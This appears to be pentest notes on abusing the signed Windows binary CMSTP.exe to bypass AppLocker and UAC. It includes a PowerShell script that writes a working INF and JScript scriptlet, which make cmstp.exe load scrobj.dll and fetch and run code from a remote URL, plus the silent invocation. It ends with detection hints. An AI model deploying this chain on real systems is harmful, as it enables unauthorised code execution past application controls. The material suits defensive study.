# CMSTP

Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile used for remote access connections.

Adversaries may supply CMSTP.exe with INF files that carry malicious commands. Similar to Regsvr32 / "Squiblydoo", CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers: the INF directs CMSTP.exe to load scrobj.dll with a scriptlet URL as its argument. This execution may also bypass AppLocker and other application control defenses, since CMSTP.exe is a legitimate, signed Microsoft binary shipped in System32 and is typically covered by default allow rules.

CMSTP.exe can also be abused to bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface (the CMSTPLUA object).

**Example**

This one was a little tricky: we need to create an INF file, but also have an SCT file waiting remotely, because the INF makes CMSTP.exe load scrobj.dll, which in turn fetches and executes our scriptlet.

![](/files/-MRkXmlkFXW2YGvgRlHW)

Execution is then simple:

![](/files/-MRkXn_YqKV5JozbzlFg)

Careful: this creates a VPN connection profile and also leaves a shortcut on the Desktop. One way to avoid leaving those behind is to have the payload hand you a shell (PowerShell, cmd). In this demo they are left behind, I think, because execution finalizes instead of staying in a continuously running state, as it would while serving a shell.
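The two files the demo needs, as an added example that is not part of the original notes. The INF follows the LOLBAS Cmstp.inf and the scriptlet follows the NickTyrer Bypass.sct linked in the references below; the lab directory, the URL the SCT is served from, and the calc.exe placeholder payload are assumptions for the demo and must be changed for your own setup. The script only writes the files and prints the commands; it does not run cmstp.exe itself.

```powershell
# Added example: writes the INF and SCT for the CMSTP / scrobj.dll chain into a
# lab folder and prints the install and cleanup commands. Modeled on the LOLBAS
# Cmstp.inf and the NickTyrer Bypass.sct referenced on this page.
$LabDir  = 'C:\Lab\cmstp'                       # assumption: writable lab folder
$SctUrl  = 'http://192.168.56.10/Bypass.sct'    # assumption: host that will serve Bypass.sct
$Payload = 'calc.exe'                           # assumption: benign placeholder payload

New-Item -ItemType Directory -Path $LabDir -Force | Out-Null

# 1. The scriptlet. scrobj.dll fetches this URL and runs the embedded JScript;
#    the same file also works with regsvr32 /s /n /u /i:<url> scrobj.dll.
$sct = @"
<?XML version="1.0"?>
<scriptlet>
<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true">
</registration>
<script language="JScript">
<![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("$Payload");
]]>
</script>
</scriptlet>
"@
Set-Content -Path (Join-Path $LabDir 'Bypass.sct') -Value $sct -Encoding ASCII

# 2. The INF. [UnRegisterOCXSection] makes cmstp.exe load %11%\scrobj.dll
#    (%11% = System32) and call its unregister routine with the URL as the
#    argument, which pulls and executes the scriptlet. ServiceName/ShortSvcName
#    name the Connection Manager profile that is left behind after execution.
#    `$ is escaped so PowerShell does not expand $chicago$ inside the here-string.
$inf = @"
[version]
Signature=`$chicago`$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,$SctUrl

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
"@
$infPath = Join-Path $LabDir 'Yay.inf'
Set-Content -Path $infPath -Value $inf -Encoding ASCII

# 3. Serve Bypass.sct from $SctUrl first (e.g. python -m http.server 80 in the
#    folder holding it), then run the LOLBAS invocation (/ni /s: silent, no prompts).
Write-Host "Install: cmstp.exe /ni /s `"$infPath`""

# 4. Cleanup of the profile artefact described above: /u uninstalls the profile
#    named in [Strings] using the same INF, /s keeps it silent.
Write-Host "Remove:  cmstp.exe /u /s `"$infPath`""
```

The INF is the interesting part: nothing in it looks like a command, which is why content-based INF filters miss it. The execution primitive is the OCX unregister path, so hunting for cmstp.exe loading scrobj.dll, or cmstp.exe spawning a child process, is a more reliable check than inspecting the INF text.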

References:

<https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf>

<https://www.contextis.com/en/blog/applocker-bypass-via-registry-key-manipulation>

<https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/>

<https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80>

<https://twitter.com/NickTyrer/status/958450014111633408>
